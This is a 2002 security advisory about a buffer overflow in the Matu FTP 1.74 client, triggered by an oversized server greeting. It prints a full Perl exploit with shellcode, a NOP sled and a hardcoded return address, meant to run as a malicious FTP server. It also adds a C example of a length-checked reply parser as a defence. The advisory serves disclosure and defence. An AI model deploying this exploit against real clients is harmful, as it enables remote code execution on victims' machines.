26th Sep 2002 [SBWID-5303]
COMMAND
	Matu FTP remote root exploit
SYSTEMS AFFECTED
	Matu FTP Version 1.74
PROBLEM
	Kanatoko [http://www.jumperz.net/] found:
	The buffer overflow occurs when a long string such as
	
	220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>
	
	is received by Matu FTP at the beginning of an FTP session. This
	vulnerability allows a malicious FTP server to execute arbitrary code
	on client hosts.
	The exploit code below is invoked as an FTP server through inetd.
	
	#!/usr/local/bin/perl
	#------------------------------------------------------
	# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
	# ( run under inetd )
	# written by Kanatoko <[email protected]>
	# http://www.jumperz.net/
	#------------------------------------------------------
	$|=1;
	        #egg written by UNYUN (http://www.shadowpenguin.org/)
	$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
	$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
	$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
	$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
	$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
	$egg .= "notepad.exe";
	        #egg_address = 0x0012F43C
	$buf = "\x90" x 217;
	$buf .= $egg;
	$buf .= "A" x 2;
	$buf .= "\x3C\xF4\x12\x00";
	$buf .= "B" x 80;
	print "220 $buf\r\n";
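
	A client that checks the length of a reply line before copying it is not exposed to the oversized greeting described above. The following is an added example, not Matu FTP's code and not part of the original advisory: a reply parser that bounds and validates the 220 line first. The names parse_reply and REPLY_MAX, the 512-byte cap and the printable-ASCII policy are assumptions made here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define REPLY_MAX 512 /* assumed cap on one reply line, not a Matu FTP value */
enum { REPLY_OK = 0, REPLY_TOO_LONG = -1, REPLY_MALFORMED = -2 };

/* Parse one "NNN text\r\n" reply received on the control connection.
 * The text is copied into out only after its length has been checked;
 * out and *code are left untouched on failure. */
int parse_reply(const unsigned char *wire, size_t n, int *code,
                char *out, size_t out_cap)
{
    size_t limit = n < REPLY_MAX ? n : REPLY_MAX, eol = 0, i;

    /* Look for CRLF inside the first REPLY_MAX bytes only. */
    while (eol + 1 < limit && !(wire[eol] == '\r' && wire[eol + 1] == '\n'))
        eol++;
    if (eol + 1 >= limit)
        return REPLY_TOO_LONG;      /* no terminator within the cap */
    /* Three digits, then a space or '-' (multi-line marker). */
    if (eol < 4 || !isdigit(wire[0]) || !isdigit(wire[1]) ||
        !isdigit(wire[2]) || (wire[3] != ' ' && wire[3] != '-'))
        return REPLY_MALFORMED;
    if (eol - 4 >= out_cap)
        return REPLY_TOO_LONG;      /* text plus NUL would not fit in out */
    /* Assumed strict policy: greeting text must be printable ASCII. */
    for (i = 4; i < eol; i++)
        if (wire[i] < 0x20 || wire[i] > 0x7e)
            return REPLY_MALFORMED;

    memcpy(out, wire + 4, eol - 4);
    out[eol - 4] = '\0';
    *code = (wire[0] - '0') * 100 + (wire[1] - '0') * 10 + (wire[2] - '0');
    return REPLY_OK;
}

int main(void)
{
    unsigned char big[700];         /* constructed oversized greeting */
    char text[64];
    int code = 0;
    memcpy(big, "220 ", 4);
    memset(big + 4, 'A', sizeof big - 6);
    memcpy(big + sizeof big - 2, "\r\n", 2);
    printf("%d\n", parse_reply((const unsigned char *)"220 ready\r\n", 11,
                               &code, text, sizeof text));
    printf("%d\n", parse_reply(big, sizeof big, &code, text, sizeof text));
    return 0;
}
```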
	
SOLUTION
	None yet